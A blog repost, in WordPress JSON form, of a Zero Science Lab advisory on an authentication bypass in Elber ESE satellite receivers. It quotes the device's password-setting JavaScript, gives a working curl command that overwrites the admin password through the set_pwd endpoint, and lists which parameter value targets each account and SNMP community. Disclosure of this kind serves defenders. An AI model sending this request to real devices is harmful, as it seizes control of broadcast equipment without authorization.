{"id":56343,"date":"2024-04-18T20:20:34","date_gmt":"2024-04-18T16:20:34","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178140\/ZSL-2024-5820.txt"},"modified":"2024-04-18T20:20:34","modified_gmt":"2024-04-18T16:20:34","slug":"elber-ese-dvb-s-s2-satellite-receiver-1-5-x-authentication-bypass","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/elber-ese-dvb-s-s2-satellite-receiver-1-5-x-authentication-bypass\/","title":{"rendered":"Elber ESE DVB-S\/S2 Satellite Receiver 1.5.x Authentication Bypass"},"content":{"rendered":"<p>Elber ESE DVB-S\/S2 Satellite Receiver 1.5.x Authentication Bypass<\/p>\n<p>Vendor: Elber S.r.l.<br \/>Product web page: https:\/\/www.elber.it<br \/>Affected version: 1.5.179 Revision 904<br \/>1.5.56 Revision 884<br \/>1.229 Revision 440<\/p>\n<p>Summary: ESE (Elber Satellite Equipment) product line, designed for the<br \/>high-end radio contribution and distribution market, where quality and<br \/>reliability are most important. The Elber IRD (Integrated Receiver Decoder)<br \/>ESE-01 offers a professional audio quality (and composite video) at an<br \/>excellent quality\/price ratio. The development of digital satellite contribution<br \/>networks and the need to connect a large number of sites require a cheap<br \/>but reliable and performing satellite receiver with integrated decoder.<\/p>\n<p>Desc: The device suffers from an authentication bypass vulnerability through<br \/>a direct and unauthorized access to the password management functionality. The<br \/>issue allows attackers to bypass authentication by manipulating the set_pwd<br \/>endpoint that enables them to overwrite the password of any user within the<br \/>system. This grants unauthorized and administrative access to protected areas<br \/>of the application compromising the device&#8217;s system security.<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br \/>\/modules\/pwd.html<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br \/>50: function apply_pwd(level, pwd)<br \/>51: {<br \/>52: $.get(&#8220;json_data\/set_pwd&#8221;, {lev:level, pass:pwd},<br \/>53: function(data){<br \/>54: \/\/$.alert({title:&#8217;Operation&#8217;,text:data});<br \/>55: show_message(data);<br \/>56: }).fail(function(error){<br \/>57: show_message(&#8216;Error &#8216; + error.status, &#8216;error&#8217;);<br \/>58: });<br \/>59: }<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/p>\n<p>Tested on: NBFM Controller<br \/>embOS\/IP<\/p>\n<p>Vulnerability discovered by Gjoko &#8216;LiquidWorm&#8217; Krstic<br \/>@zeroscience<\/p>\n<p>Advisory ID: ZSL-2024-5820<br \/>Advisory URL: https:\/\/www.zeroscience.mk\/en\/vulnerabilities\/ZSL-2024-5820.php<\/p>\n<p>18.08.2023<\/p>\n<p>&#8212;<\/p>\n<p>$ curl -s http:\/\/[TARGET]\/json_data\/set_pwd?lev=2&amp;pass=admin1234<\/p>\n<p>Ref (lev param):<\/p>\n<p>Level 7 = SNMP Write Community (snmp_write_pwd)<br \/>Level 6 = SNMP Read Community (snmp_read_pwd)<br \/>Level 5 = Custom Password? hidden. (custom_pwd)<br \/>Level 4 = Display Password (display_pwd)?<br \/>Level 2 = Administrator Password (admin_pwd)<br \/>Level 1 = Super User Password (puser_pwd)<br \/>Level 0 = User Password (user_pwd)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Elber ESE DVB-S\/S2 Satellite Receiver 1.5.x Authentication Bypass Vendor: Elber S.r.l.Product web page: https:\/\/www.elber.itAffected version: 1.5.179 Revision 9041.5.56 Revision 8841.229 Revision 440 Summary: ESE (Elber Satellite Equipment) product line, designed for thehigh-end radio contribution and distribution market, where quality andreliability are most important. The Elber IRD (Integrated Receiver Decoder)ESE-01 offers a professional audio quality (and &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56343","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56343","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56343"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56343\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56343"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56343"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56343"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}